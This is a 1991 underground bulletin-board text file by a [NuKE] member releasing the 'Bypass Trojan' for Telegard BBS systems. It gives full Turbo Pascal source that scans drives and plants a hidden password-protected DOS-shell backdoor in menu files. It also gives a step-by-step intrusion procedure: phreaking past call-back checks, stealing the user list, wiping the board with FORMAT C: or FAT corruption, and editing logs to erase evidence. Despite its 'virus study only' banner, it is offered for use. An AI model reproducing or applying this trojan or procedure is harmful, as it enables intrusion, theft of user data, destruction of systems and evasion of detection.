;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ; ; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ; ; ; *** NOT FOR GENERAL DISTRIBUTION *** ; ; ; ; This File is for the Purpose of Virus Study Only! It Should not be Passed ; ; Around Among the General Public. It Will be Very Useful for Learning how ; ; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; ; Experience can Turn it Into a far More Malevolent Program Than it Already ; ; Is. Keep This Code in Responsible Hands! ; ; ; ;****************************************************************************; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Bypass Trojan v1.0 and v2.0 : Created by: Mechanix Released : October 1991 Introduction: Well this is basically another backdoor creator for Telegard Systems. This one is relatively fullproof except for the fact that it requires REMOTE.BAT to exist on the target system, or it will not function properly. However, the Bypass Trojan v2.0 takes care of this problem as it creates REMOTE.BAT on the target system, if it doesn't exist already. This is why I am also releasing the source (in Turbo Pascal) to the Bypass Trojan v1.0. You will find the source after the description. Description: This trojan will scan all directories on drives C: to E: in search of the MAIN.MNU file. Then it will append a few lines to the file as to create a hidden command to shell to DOS. It also checks to see if the MAIN.MNU file is Read-Only or Hidden, and will remove these attributes long enough to make the changes. It will also check for write-protection. The source can also be changed as to modify any of the .MNU files. Notes: This trojan uses a basic Turbo Pascal cycle to scan all directories and files, and thus the source can be modified for a number of uses. As for a good procedure to nail the board once the shell to DOS command has been implemented, I recommend the following: - First and foremost, use a PBX or other phreaking trick to avoid the annoying Maestro phone. - Call preferably around 4-5 am, when the SysOp is almost sure not to be around. - Use the shuttle password (if there is one) and then apply as a NEW user after you have bypassed the shuttle password. This will usually bypass CBV utilities. - Shell to DOS in the correct menu. - Turn your capture mode on, as to record everything you see. - Go get the user list and ZIP it up with another ZIP file that is already online. This way you can D/L it later when you log on again. Or capture it through a text file viewing utility if you find one on the system. - If you don't want the user list, and just want to crash the board, then FORMAT C: should do the trick. Or uses DEBUG to rearrange his FATs. Or if it's a H/P board, use one of the online virii or trojans to screw him. That will teach him, and you get to test them out. - If you decide to only take the user list and let the board live, then go edit the logs as to remove all evidence of your actions. If there's a spool to printer log, you're in trouble. - If you could not bypass CBV, then find that utility's log and edit out your number. - Lastly, take off the DOS shell command from the menu you modified in the first place, unless you want to use it again, but this is risky. Well that's the method I've been using, but the choice is your's. Source: PROGRAM BYPASS1; { Bypass Trojan v1.0 } { Created by: Mî›H’ï!X [NuKE] } { Created on: 27/09/91 } USES DOS; VAR Target : SEARCHREC; T : TEXT; PROCEDURE DIRECT (PATH : STRING); VAR PATH2 : STRING; INFO : SEARCHREC; INFO2 : SEARCHREC; F : TEXT; BEGIN Findfirst (PATH + '\*.*',$10,INFO); WHILE DOSERROR = 0 DO BEGIN IF (INFO.ATTR = $10) AND (INFO.NAME[1] <> '.') THEN Begin PATH2 := PATH + '\' + INFO.NAME; Chdir (PATH2); Findfirst ('MAIN.MNU',($3F - $10),INFO2); { Or any .MNU you wish } WHILE DOSERROR = 0 DO Begin ASSIGN (F,INFO2.NAME); Setfattr (F,$20); Append (F); Writeln (F,' '); Writeln (F,' '); Writeln (F,'#'); { Key to add } Writeln (F,' '); Writeln (F,'-$'); Writeln (F,'NUKEWAR;PW: ;^8WRONG - access denied!'); { Password } Writeln (F,' '); Writeln (F,' '); Writeln (F,' '); Writeln (F,'#'); { Key to add } Writeln (F,' '); Writeln (F,'D-'); Writeln (F,'REMOTE.BAT'); Close (F); Findnext(INFO2); End; DIRECT (PATH2); End; Findnext(INFO); End; END; PROCEDURE FILEFIND (DRIVE : CHAR); BEGIN Chdir (DRIVE + ':\'); Findfirst ('MAIN.MNU',($3F - $10),Target); { Or any .MNU you wish } WHILE DOSERROR = 0 DO Begin ASSIGN (T,Target.name); Setfattr (T,$20); {$I-} Append (T); {$I+} IF IORESULT = 0 THEN Begin Writeln (T,' '); Writeln (T,'#'); { Key to add } Writeln (T,' '); Writeln (T,'-$'); Writeln (T,'NUKEWAR;PW: ;^8WRONG - access denied!'); { Password } Writeln (T,' '); Writeln (T,' '); Writeln (T,' '); Writeln (T,'#'); { Key to add } Writeln (T,' '); Writeln (T,'D-'); Writeln (T,'REMOTE.BAT'); Close (T); End ELSE Exit; Findnext (Target); End; DIRECT (DRIVE + ':'); END; BEGIN {$I-} Chdir ('C:\'); {$I+} IF IORESULT = 0 THEN FILEFIND ('C'); {$I-} Chdir ('D:\'); {$I+} IF IORESULT = 0 THEN FILEFIND ('D'); {$I-} Chdir ('E:\'); {$I+} IF IORESULT = 0 THEN FILEFIND ('E'); END. Well there it is. Please feel free to improve it in anyway you like. I will soon release the source to Bypass Trojan v2.0 which checks for REMOTE.BAT and creates one if needed. The REMOTE.BAT file also has the Hidden attribute to try and hide it from the SysOp. The reason for this, is that smart SysOps, and any of those who are reading this, rename the REMOTE.BAT or remove it, to avoid this sort of trojan. The original release is for a modem on Com2. If you wish to have the trojan for another device, either edit it in the .EXE, or contact me (Mechanix) on any [NuKE] board, and I will recompile the source for you with another device. Mechanix [NuKE] ;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ; ; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ; ; ; *** NOT FOR GENERAL DISTRIBUTION *** ; ; ; ; This File is for the Purpose of Virus Study Only! It Should not be Passed ; ; Around Among the General Public. It Will be Very Useful for Learning how ; ; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; ; Experience can Turn it Into a far More Malevolent Program Than it Already ; ; Is. Keep This Code in Responsible Hands! ; ; ; ;****************************************************************************;